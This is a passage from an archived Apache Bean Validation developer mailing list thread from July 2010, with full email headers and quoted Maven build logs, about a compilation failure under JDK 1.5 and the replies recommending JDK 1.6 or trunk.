d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:date:message-id :subject:from:to:content-type; bh=SB9WO4WiZ1hO3v37G17qMJj2U0zWZbfEboMwVXUd+hU=; b=ssaFp9av5dIVJPwYtP+Fpa5OvbGKyYnZxQet5uRb9ixKqMUGD2gY67HzRUKwYkyJl+ zyggYMjuma4HMA2ywbgf03GI7IRCg4RL2NwaBc3UjXqcWvjzVADBGwwCHbTodv6WeyZ+ inHia6XX7lZo9JpwFKoP11m0eOmitw5iKU/ZQ= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=PSNuF+HT/yDQ3CedmiQ5pR0pNLVGUxIl58qcTNZjXNCdWP/l4XL8eiWA+r6/rGaQrY t3F3MaEhYvRZYmcqTF6kFndE3MtN1VLkhGtyQW7RHklmzNtfu6Ty+EsW7MRju3bFN7up cJ2lPRkTU6+4Zj1+sWJXKvXwK8xwcfNTRl5z8= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id h17mr666694qai.386.1279273107952; Fri, 16 Jul 2010 02:38:27 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 16 Jul 2010 02:38:27 -0700 (PDT) Date: Fri, 16 Jul 2010 15:08:27 +0530 Message-ID: <[email protected]> Subject: Compilation error while building tags\0.1-incubating From: Vamsavardhana Reddy <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=00c09f8995d72b941b048b7dfb4f X-Virus-Checked: Checked by ClamAV on apache.org --00c09f8995d72b941b048b7dfb4f Content-Type: text/plain; charset=ISO-8859-1 Hi, I am hitting a compilation error in bval-jsr303 module while building tags\0.1-incubating. The output in command window is given below: ============================== [INFO] ------------------------------------------------------------------------ [INFO] Building Apache Bean Validation acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b bval-jsr303 [INFO] task-segment: [install] [INFO] ------------------------------------------------------------------------ [INFO] [enforcer:enforce {execution: default}] [INFO] [jaxb2:xjc {execution: default}] [INFO] Generating source... [INFO] parsing a schema... [INFO] compiling a schema... [INFO] org\apache\bval\jsr303\xml\AnnotationType.java [INFO] org\apache\bval\jsr303\xml\BeanType.java [INFO] org\apache\bval\jsr303\xml\ClassType.java [INFO] org\apache\bval\jsr303\xml\ConstraintDefinitionType.java [INFO] org\apache\bval\jsr303\xml\ConstraintMappingsType.java [INFO] org\apache\bval\jsr303\xml\ConstraintType.java [INFO] org\apache\bval\jsr303\xml\ElementType.java [INFO] org\apache\bval\jsr303\xml\FieldType.java [INFO] org\apache\bval\jsr303\xml\GetterType.java [INFO] org\apache\bval\jsr303\xml\GroupSequenceType.java [INFO] org\apache\bval\jsr303\xml\GroupsType.java [INFO] org\apache\bval\jsr303\xml\ObjectFactory.java [INFO] org\apache\bval\jsr303\xml\PayloadType.java [INFO] org\apache\bval\jsr303\xml\PropertyType.java [INFO] org\apache\bval\jsr303\xml\ValidatedByType.java [INFO] org\apache\bval\jsr303\xml\ValidationConfigType.java [INFO] org\apache\bval\jsr303\xml\package-info.java [INFO] [remote-resources:process {execution: process-remote-resources}] [INFO] [remote-resources:process {execution: default}] [INFO] [resources:resources {execution: default-resources}] [INFO] Using 'UTF-8' encoding to copy filtered resources. [INFO] Copying 7 resources [INFO] Copying 2 resources to META-INF [INFO] Copying 4 resources [INFO] Copying 4 resources [INFO] [compiler:compile {execution: default-compile}] [INFO] Compiling 129 source files to C:\G\BVAL\tags\0.1-incubating\bval-jsr303\target\classes [INFO] ------------------------------------------------------------------------ [ERROR] BUILD FAILURE [INFO] ------------------------------------------------------------------------ [INFO] Compilation failure C:\G\BVAL\tags\0.1-incubating\bval-jsr303\src\main\java\org\apache\bval\jsr303\util\ClassHelper.java:[54,36] cannot find symbol symbol : constructor ArrayList(java.util.List<java.lang.Class>) location: class java.util.ArrayList<java.lang.Class<?>> C:\G\BVAL\tags\0.1-incubating\bval-jsr303\src\main\java\org\apache\bval\jsr303\ClassValidator.java:[579,48] cannot find symbol symbol : method isEmpty() location: class java.lang.String C:\G\BVAL\tags\0.1-incubating\bval-jsr303\src\main\java\org\apache\bval\jsr303\BeanDescriptorImpl.java:[79,48] cannot find symbol symbol : method isEmpty() location: class java.lang.String [INFO] ------------------------------------------------------------------------ [INFO] For more information, run Maven with the -e switch [INFO] ------------------------------------------------------------------------ [INFO] Total time: 3 minutes 48 seconds [INFO] Finished at: Fri Jul 16 12:18:37 IST 2010 [INFO] Final Memory: 33M/65M [INFO] ------------------------------------------------------------------------ C:\G\BVAL\tags\0.1-incubating>java -version java version "1.5.0_17" Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_17-b04) Java HotSpot(TM) Client VM (build 1.5.0_17-b04, mixed mode) ================================================= I am using Sun Java 1.5.0, Maven 2.2.1 on Windows XP SP3. Can someone point out what am I doing wrong? Thanks, -- Vamsi --00c09f8995d72b941b048b7dfb4f-- From [email protected] Fri Jul 16 13:45:04 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59859 invoked from network); 16 Jul 2010 13:45:04 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 16 Jul 2010 13:45:04 -0000 Received: (qmail 76242 invoked by uid 500); 16 Jul 2010 13:45:04 -0000 Delivered-To: [email protected] Received: (qmail 76197 invoked by uid 500); 16 Jul 2010 13:45:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 76189 invoked by uid 99); 16 Jul 2010 13:45:02 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jul 2010 13:45:02 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_NEUTRAL,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web27807.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Fri, 16 Jul 2010 13:44:54 +0000 Received: (qmail 46270 invoked by uid 60001); 16 Jul 2010 13:44:32 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1279287872; bh=+vJEEltRuzN6gyGqEaYJMUHdOAyLYip4JIynybEUurA=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=MeEnI3jxWoTvEejqp62kIaZMBuLJPqnmJfv704SWvRt03B6Rl2YAuATvHiEelU/t25JYKgbg9qrIdYTyY2QUSdGAPur8noWzCyH1bxV8Pg7VVyGVFHXt3VNyI8aQK0iTwFRHRPxd6xiPFYVwlg+7tPGC6oR73my1ZtDPuhL+uiQ= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=Tdw8mqTS7nRLpV63scl2uxA4nNqhL/yfOPBPq5uWst5cIZJRzp1OCpd1qRxxsQO/GY7bte6f2Un+L5t0PNDTOlqOZg71k01hZTHi9ZSIBbXeb9t+zM8bHXW65ilaru5xMX5ITPIATf4CZH/ngUW231lDsJttXYRQfu+Fy2Bfa/Y=; Message-ID: <[email protected]> X-YMail-OSG: 24B.1YMVM1mRCdZke80S2x18J6LhR2aXOekYQPf9VjTV51z Cc61IGDP_TNgDL3H5i4Ghop2hVqmK5sZqIkMHCu3y.Bf4.xxcFwdN_w0kXP2 Hi8T3DVsM2kapHDtt032ySFfes2Bv6jNSJHvqnJk65xv5KxQ99qK7O4EsXGY vHM7a3I3ZALSvMRkhtjqJwSv0Le31.scKQpountG1B8FgVQO7M5pZEs6L9yD Uy0RMJOxinoXj6ebJwTLDrhcjqYh6vRXYauv6qIH.ZZd0p.YIZRU_zhNcNPQ 25HEK2UD.u5hTEXyg6mtMQrPxW94t6gnryyoDlXAaWwT_6zLFfNsEnhGrF1N aCCUngDw- Received: from [161.129.204.104] by web27807.mail.ukl.yahoo.com via HTTP; Fri, 16 Jul 2010 13:44:32 GMT X-Mailer: YahooMailClassic/11.2.4 YahooMailWebService/161.129.204.1046605 Date: Fri, 16 Jul 2010 13:44:32 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: Re: Compilation error while building tags\0.1-incubating To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org hi! Please try to run with jdk1.6 :) LieGrue, strub --- On Fri, 7/16/10, Vamsavardhana Reddy <[email protected]> wrote: > From: Vamsavardhana Reddy <[email protected]> > Subject: Compilation error while building tags\0.1-incubating > To: [email protected] > Date: Friday, July 16, 2010, 9:38 AM > Hi, >=20 > I am hitting a compilation error in bval-jsr303 module > while building > tags\0.1-incubating.=A0 The output in command window is > given below: > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D > [INFO] > ------------------------------------------------------------------------ > [INFO] Building Apache Bean Validation acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b bval-jsr303 > [INFO]=A0 =A0 task-segment: [install] > [INFO] > ------------------------------------------------------------------------ > [INFO] [enforcer:enforce {execution: default}] > [INFO] [jaxb2:xjc {execution: default}] > [INFO] Generating source... > [INFO] parsing a schema... > [INFO] compiling a schema... > [INFO] org\apache\bval\jsr303\xml\AnnotationType.java > [INFO] org\apache\bval\jsr303\xml\BeanType.java > [INFO] org\apache\bval\jsr303\xml\ClassType.java > [INFO] > org\apache\bval\jsr303\xml\ConstraintDefinitionType.java > [INFO] > org\apache\bval\jsr303\xml\ConstraintMappingsType.java > [INFO] org\apache\bval\jsr303\xml\ConstraintType.java > [INFO] org\apache\bval\jsr303\xml\ElementType.java > [INFO] org\apache\bval\jsr303\xml\FieldType.java > [INFO] org\apache\bval\jsr303\xml\GetterType.java > [INFO] org\apache\bval\jsr303\xml\GroupSequenceType.java > [INFO] org\apache\bval\jsr303\xml\GroupsType.java > [INFO] org\apache\bval\jsr303\xml\ObjectFactory.java > [INFO] org\apache\bval\jsr303\xml\PayloadType.java > [INFO] org\apache\bval\jsr303\xml\PropertyType.java > [INFO] org\apache\bval\jsr303\xml\ValidatedByType.java > [INFO] > org\apache\bval\jsr303\xml\ValidationConfigType.java > [INFO] org\apache\bval\jsr303\xml\package-info.java > [INFO] [remote-resources:process {execution: > process-remote-resources}] > [INFO] [remote-resources:process {execution: default}] > [INFO] [resources:resources {execution: > default-resources}] > [INFO] Using 'UTF-8' encoding to copy filtered resources. > [INFO] Copying 7 resources > [INFO] Copying 2 resources to META-INF > [INFO] Copying 4 resources > [INFO] Copying 4 resources > [INFO] [compiler:compile {execution: default-compile}] > [INFO] Compiling 129 source files to > C:\G\BVAL\tags\0.1-incubating\bval-jsr303\target\classes > [INFO] > ------------------------------------------------------------------------ > [ERROR] BUILD FAILURE > [INFO] > ------------------------------------------------------------------------ > [INFO] Compilation failure >=20 > C:\G\BVAL\tags\0.1-incubating\bval-jsr303\src\main\java\org\apache\bval\j= sr303\util\ClassHelper.java:[54,36] > cannot find symbol > symbol=A0 : constructor > ArrayList(java.util.List<java.lang.Class>) > location: class > java.util.ArrayList<java.lang.Class<?>> >=20 > C:\G\BVAL\tags\0.1-incubating\bval-jsr303\src\main\java\org\apache\bval\j= sr303\ClassValidator.java:[579,48] > cannot find symbol > symbol=A0 : method isEmpty() > location: class java.lang.String >=20 > C:\G\BVAL\tags\0.1-incubating\bval-jsr303\src\main\java\org\apache\bval\j= sr303\BeanDescriptorImpl.java:[79,48] > cannot find symbol > symbol=A0 : method isEmpty() > location: class java.lang.String >=20 >=20 > [INFO] > ------------------------------------------------------------------------ > [INFO] For more information, run Maven with the -e switch > [INFO] > ------------------------------------------------------------------------ > [INFO] Total time: 3 minutes 48 seconds > [INFO] Finished at: Fri Jul 16 12:18:37 IST 2010 > [INFO] Final Memory: 33M/65M > [INFO] > ------------------------------------------------------------------------ > C:\G\BVAL\tags\0.1-incubating>java -version > java version "1.5.0_17" > Java(TM) 2 Runtime Environment, Standard Edition (build > 1.5.0_17-b04) > Java HotSpot(TM) Client VM (build 1.5.0_17-b04, mixed > mode) > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D >=20 > I am using Sun Java 1.5.0, Maven 2.2.1 on Windows XP SP3. >=20 > Can someone point out what am I doing wrong? >=20 > Thanks, > --=20 > Vamsi > =0A=0A=0A From [email protected] Fri Jul 16 15:04:40 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 80729 invoked from network); 16 Jul 2010 15:04:40 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 16 Jul 2010 15:04:40 -0000 Received: (qmail 3880 invoked by uid 500); 16 Jul 2010 15:04:40 -0000 Delivered-To: [email protected] Received: (qmail 3858 invoked by uid 500); 16 Jul 2010 15:04:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 3850 invoked by uid 99); 16 Jul 2010 15:04:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jul 2010 15:04:39 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=FREEMAIL_FROM,HTML_MESSAGE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ey0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jul 2010 15:04:32 +0000 Received: by eyf5 with SMTP id 5so571239eyf.6 for <[email protected]>; Fri, 16 Jul 2010 08:03:23 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type; bh=HUq9b+pr4SFvPcIm87n8kQbHL/5wWx0iJdY96HO1ovs=; b=HAkBQPCxk8wmrE1eBnvOzHHPBF7k3IeSQiuGlAsqcQPM4Xa7xHL6rfjZxomH8+ey3R 9LqIKpoEOZZHGl3xIz3iS75IDaLBgOdwkSy7t3P3Z3jbv+FX9RTxrveM+3o9J7Ibwxlo K66QJOluAKofg9WkeJzpu2Vn5XKN6CyjAU3Bs= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=KcZJhZd0Gt9aApm9ZxkNJvXTAkIXh6bwkZfH635S+SFMZx4G86o1E22dlQPhiAOPhi t4hKhkYUujh7zyyZ4G7BQVAoKK7QuyJZK3NqWoiEhSNKRpigXD7fYgAL7wXr6UEduDtz dAv4tyeMx2yMMVu+YI6oub4dtpRUmwlqObKdU= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id 11mr1247311ebs.13.1279292602131; Fri, 16 Jul 2010 08:03:22 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 16 Jul 2010 08:03:21 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Fri, 16 Jul 2010 20:33:21 +0530 Message-ID: <[email protected]> Subject: Re: Compilation error while building tags\0.1-incubating From: Vamsavardhana Reddy <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0015174c0d2e1d2735048b828588 X-Virus-Checked: Checked by ClamAV on apache.org --0015174c0d2e1d2735048b828588 Content-Type: text/plain; charset=ISO-8859-1 Hi Mark, Thanks. The build runs fine with JDK 1.6. I expected it to compile with JDK 1.5 as well since in the home page it reads, "The goal of the Bean Validation project is to deliver an implementation of the Bean Validation Specfication (JSR303) <http://jcp.org/en/jsr/detail?id=303>, which is TCK compliant and works on Java SE 5 or later.... ". If we build the binaries with JDK 1.6, will they be 100% usable under JDK 1.5?? On Fri, Jul 16, 2010 at 7:14 PM, Mark Struberg <[email protected]> wrote: > hi! > > Please try to run with jdk1.6 :) > > LieGrue, > strub > > --- On Fri, 7/16/10, Vamsavardhana Reddy <[email protected]> wrote: > > > From: Vamsavardhana Reddy <[email protected]> > > Subject: Compilation error while building tags\0.1-incubating > > To: [email protected] > > Date: Friday, July 16, 2010, 9:38 AM > > Hi, > > > > I am hitting a compilation error in bval-jsr303 module > > while building > > tags\0.1-incubating. The output in command window is > > given below: > > ============================== > > [INFO] > > ------------------------------------------------------------------------ > > [INFO] Building Apache Bean Validation acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b bval-jsr303 > > [INFO] task-segment: [install] > > [INFO] > > ------------------------------------------------------------------------ > > [INFO] [enforcer:enforce {execution: default}] > > [INFO] [jaxb2:xjc {execution: default}] > > [INFO] Generating source... > > [INFO] parsing a schema... > > [INFO] compiling a schema... > > [INFO] org\apache\bval\jsr303\xml\AnnotationType.java > > [INFO] org\apache\bval\jsr303\xml\BeanType.java > > [INFO] org\apache\bval\jsr303\xml\ClassType.java > > [INFO] > > org\apache\bval\jsr303\xml\ConstraintDefinitionType.java > > [INFO] > > org\apache\bval\jsr303\xml\ConstraintMappingsType.java > > [INFO] org\apache\bval\jsr303\xml\ConstraintType.java > > [INFO] org\apache\bval\jsr303\xml\ElementType.java > > [INFO] org\apache\bval\jsr303\xml\FieldType.java > > [INFO] org\apache\bval\jsr303\xml\GetterType.java > > [INFO] org\apache\bval\jsr303\xml\GroupSequenceType.java > > [INFO] org\apache\bval\jsr303\xml\GroupsType.java > > [INFO] org\apache\bval\jsr303\xml\ObjectFactory.java > > [INFO] org\apache\bval\jsr303\xml\PayloadType.java > > [INFO] org\apache\bval\jsr303\xml\PropertyType.java > > [INFO] org\apache\bval\jsr303\xml\ValidatedByType.java > > [INFO] > > org\apache\bval\jsr303\xml\ValidationConfigType.java > > [INFO] org\apache\bval\jsr303\xml\package-info.java > > [INFO] [remote-resources:process {execution: > > process-remote-resources}] > > [INFO] [remote-resources:process {execution: default}] > > [INFO] [resources:resources {execution: > > default-resources}] > > [INFO] Using 'UTF-8' encoding to copy filtered resources. > > [INFO] Copying 7 resources > > [INFO] Copying 2 resources to META-INF > > [INFO] Copying 4 resources > > [INFO] Copying 4 resources > > [INFO] [compiler:compile {execution: default-compile}] > > [INFO] Compiling 129 source files to > > C:\G\BVAL\tags\0.1-incubating\bval-jsr303\target\classes > > [INFO] > > ------------------------------------------------------------------------ > > [ERROR] BUILD FAILURE > > [INFO] > > ------------------------------------------------------------------------ > > [INFO] Compilation failure > > > > > C:\G\BVAL\tags\0.1-incubating\bval-jsr303\src\main\java\org\apache\bval\jsr303\util\ClassHelper.java:[54,36] > > cannot find symbol > > symbol : constructor > > ArrayList(java.util.List<java.lang.Class>) > > location: class > > java.util.ArrayList<java.lang.Class<?>> > > > > > C:\G\BVAL\tags\0.1-incubating\bval-jsr303\src\main\java\org\apache\bval\jsr303\ClassValidator.java:[579,48] > > cannot find symbol > > symbol : method isEmpty() > > location: class java.lang.String > > > > > C:\G\BVAL\tags\0.1-incubating\bval-jsr303\src\main\java\org\apache\bval\jsr303\BeanDescriptorImpl.java:[79,48] > > cannot find symbol > > symbol : method isEmpty() > > location: class java.lang.String > > > > > > [INFO] > > ------------------------------------------------------------------------ > > [INFO] For more information, run Maven with the -e switch > > [INFO] > > ------------------------------------------------------------------------ > > [INFO] Total time: 3 minutes 48 seconds > > [INFO] Finished at: Fri Jul 16 12:18:37 IST 2010 > > [INFO] Final Memory: 33M/65M > > [INFO] > > ------------------------------------------------------------------------ > > C:\G\BVAL\tags\0.1-incubating>java -version > > java version "1.5.0_17" > > Java(TM) 2 Runtime Environment, Standard Edition (build > > 1.5.0_17-b04) > > Java HotSpot(TM) Client VM (build 1.5.0_17-b04, mixed > > mode) > > ================================================= > > > > I am using Sun Java 1.5.0, Maven 2.2.1 on Windows XP SP3. > > > > Can someone point out what am I doing wrong? > > > > Thanks, > > -- > > Vamsi > > > > > > -- Vamsi --0015174c0d2e1d2735048b828588-- From [email protected] Fri Jul 16 17:40:42 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 46042 invoked from network); 16 Jul 2010 17:40:41 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 16 Jul 2010 17:40:41 -0000 Received: (qmail 43796 invoked by uid 500); 16 Jul 2010 17:40:41 -0000 Delivered-To: [email protected] Received: (qmail 43767 invoked by uid 500); 16 Jul 2010 17:40:41 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43759 invoked by uid 99); 16 Jul 2010 17:40:41 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jul 2010 17:40:41 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL,UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp109.prem.mail.ac4.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Fri, 16 Jul 2010 17:40:35 +0000 Received: (qmail 96292 invoked from network); 16 Jul 2010 17:40:14 -0000 Received: from drwoods.local ([email protected] with plain) by smtp109.prem.mail.ac4.yahoo.com with SMTP; 16 Jul 2010 10:40:13 -0700 PDT X-Yahoo-SMTP: sCI.ryiswBB7FW.DxjU523c87MI- X-YMail-OSG: GqJXD6UVM1nFxhbXeaQlgGPmY2u4McVWgT83G_jn96nlYvm 0K9vGM0nOFuG0CeYqbNfIq7B2vj_RvpTya18T.aT4l4_gPjH01jqPV6AffN2 3Br7akfUTtCxActyYdo14QOIf8vvAuTWxY7kLEhmk3nqxBaM1RvNXhlZc_4A cxEkk6mSnul3W6kjLDSgSvySC4Q9e.7TMv747arV9kZPi.3CqCcK2D_NRqtZ QCy1Nn4qNUJuCn1onNl4C2d6rRvc5I47MXvSez4joqlxiW60z9ME1VB01NQU efT6ZGsI.caCSBeEnI8KD5bJEJL9P9ybIJ0TQoliP48UXOXchDpG.RO95Uto 9Rp48eeevhsH8QA-- X-Yahoo-Newman-Property: ymail-3 Message-ID: <[email protected]> Date: Fri, 16 Jul 2010 13:40:13 -0400 From: Donald Woods <[email protected]> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:161.129.204.104) Gecko/20100608 Lightning/1.0b2 Thunderbird/3.1 MIME-Version: 1.0 To: [email protected] Subject: Re: Compilation error while building tags\0.1-incubating References: <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 1.1.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Your mileage will vary.... I'd suggest using trunk (0.2-incubating-SNAPSHOT), which has been fixed to compile and run on 1.5. -Donald On 7/16/10 11:03 AM, Vamsavardhana Reddy wrote: > Hi Mark, > > Thanks. The build runs fine with JDK 1.6. I expected it to compile with JDK > 1.5 as well since in the home page it reads, "The goal of the Bean > Validation project is to deliver an implementation of the Bean Validation > Specfication (JSR303) <http://jcp.org/en/jsr/detail?id=303>, which is TCK > compliant and works on Java SE 5 or later.... ". > > If we build the binaries with JDK 1.6, will they be 100% usable under JDK > 1.5?? > > On Fri, Jul 16, 2010 at 7:14 PM, Mark Struberg <[email protected]> wrote: > >> hi! >> >> Please try to run with jdk1.6 :) >> >> LieGrue, >> strub >> >> --- On Fri, 7/16/10, Vamsavardhana Reddy <[email protected]> wrote: >> >>> From: Vamsavardhana Reddy <[email protected]> >>> Subject: Compilation error while building tags\0.1-incubating >>> To: [email protected] >>> Date: Friday, July 16, 2010, 9:38 AM >>> Hi, >>> >>> I am hitting a compilation error in bval-jsr303 module >>> while building >>> tags\0.1-incubating. The output in command window is >>> given below: >>> ============================== >>> [INFO] >>> ------------------------------------------------------------------------ >>> [INFO] Building Apache Bean Validation acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b bval-jsr303 >>> [INFO] task-segment: [install] >>> [INFO] >>> ------------------------------------------------------------------------ >>> [INFO] [enforcer:enforce {execution: default}] >>> [INFO] [jaxb2:xjc {execution: default}] >>> [INFO] Generating source... >>> [INFO] parsing a schema... >>> [INFO] compiling a schema... >>> [INFO] org\apache\bval\jsr303\xml\AnnotationType.java >>> [INFO] org\apache\bval\jsr303\xml\BeanType.java >>> [INFO] org\apache\bval\jsr303\xml\ClassType.java >>> [INFO] >>> org\apache\bval\jsr303\xml\ConstraintDefinitionType.java >>> [INFO] >>> org\apache\bval\jsr303\xml\ConstraintMappingsType.java >>> [INFO] org\apache\bval\jsr303\xml\ConstraintType.java >>> [INFO] org\apache\bval\jsr303\xml\ElementType.java >>> [INFO] org\apache\bval\jsr303\xml\FieldType.java >>> [INFO] org\apache\bval\jsr303\xml\GetterType.java >>> [INFO] org\apache\bval\jsr303\xml\GroupSequenceType.java >>> [INFO] org\apache\bval\jsr303\xml\GroupsType.java >>> [INFO] org\apache\bval\jsr303\xml\ObjectFactory.java >>> [INFO] org\apache\bval\jsr303\xml\PayloadType.java >>> [INFO] org\apache\bval\jsr303\xml\PropertyType.java >>> [INFO] org\apache\bval\jsr303\xml\ValidatedByType.java >>> [INFO] >>> org\apache\bval\jsr303\xml\ValidationConfigType.java >>> [INFO] org\apache\bval\jsr303\xml\package-info.java >>> [INFO] [remote-resources:process {execution: >>> process-remote-resources}] >>> [INFO] [remote-resources:process {execution: default}] >>> [INFO] [resources:resources {execution: >>> default-resources}] >>> [INFO] Using 'UTF-8' encoding to copy filtered resources. >>> [INFO] Copying 7 resources >>> [INFO] Copying 2 resources to META-INF >>> [INFO] Copying 4 resources >>> [INFO] Copying 4 resources >>> [INFO] [compiler:compile {execution: default-compile}] >>> [INFO] Compiling 129 source files to >>> C:\G\BVAL\tags\0.1-incubating\bval-jsr303\target\classes >>> [INFO] >>> ------------------------------------------------------------------------ >>> [ERROR] BUILD FAILURE >>> [INFO] >>> ------------------------------------------------------------------------ >>> [INFO] Compilation failure >>> >>> >> C:\G\BVAL\tags\0.1-incubating\bval-jsr303\src\main\java\org\apache\bval\jsr303\util\ClassHelper.java:[54,36] >>> cannot find symbol >>> symbol : constructor >>> ArrayList(java.util.List<java.lang.Class>) >>> location: class >>> java.util.ArrayList<java.lang.Class<?>> >>> >>> >> C:\G\BVAL\tags\0.1-incubating\bval-jsr303\src\main\java\org\apache\bval\jsr303\ClassValidator.java:[579,48] >>> cannot find symbol >>> symbol : method isEmpty() >>> location: class java.lang.String >>> >>> >> C:\G\BVAL\tags\0.1-incubating\bval-jsr303\src\main\java\org\apache\bval\jsr303\BeanDescriptorImpl.java:[79,48] >>> cannot find symbol >>> symbol : method isEmpty() >>> location: class java.lang.String >>> >>> >>> [INFO] >>> ------------------------------------------------------------------------ >>> [INFO] For more information, run Maven with the -e switch >>> [INFO] >>> ------------------------------------------------------------------------ >>> [INFO] Total time: 3 minutes 48 seconds >>> [INFO] Finished at: Fri Jul 16 12:18:37 IST 2010 >>> [INFO] Final Memory: 33M/65M >>> [INFO] >>> ------------------------------------------------------------------------ >>> C:\G\BVAL\tags\0.1-incubating>java -version >>> java version "1.5.0_17" >>> Java(TM) 2 Runtime Environment, Standard Edition (build >>> 1.5.0_17-b04) >>> Java HotSpot(TM) Client VM (build 1.5.0_17-b04, mixed >>> mode) >>> ================================================= >>> >>> I am using Sun Java 1.5.0, Maven 2.2.1 on Windows XP SP3. >>> >>> Can someone point out what am I doing wrong? >>> >>> Thanks, >>> -- >>> Vamsi >>> >> >> >> >> > > From [email protected] Mon Jul 19 19:24:14 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 64857 invoked from network); 19 Jul 2010 19:24:14 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 19 Jul 2010 19:24:14 -0000 Received: (qmail 26917 invoked by uid 500); 19 Jul 2010 19:24:14 -0000 Delivered-To: [email protected] Received: (qmail 26877 invoked by uid 500); 19 Jul 2010 19:24:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 58368 invoked by uid 99); 19 Jul 2010 16:27:36 -0000 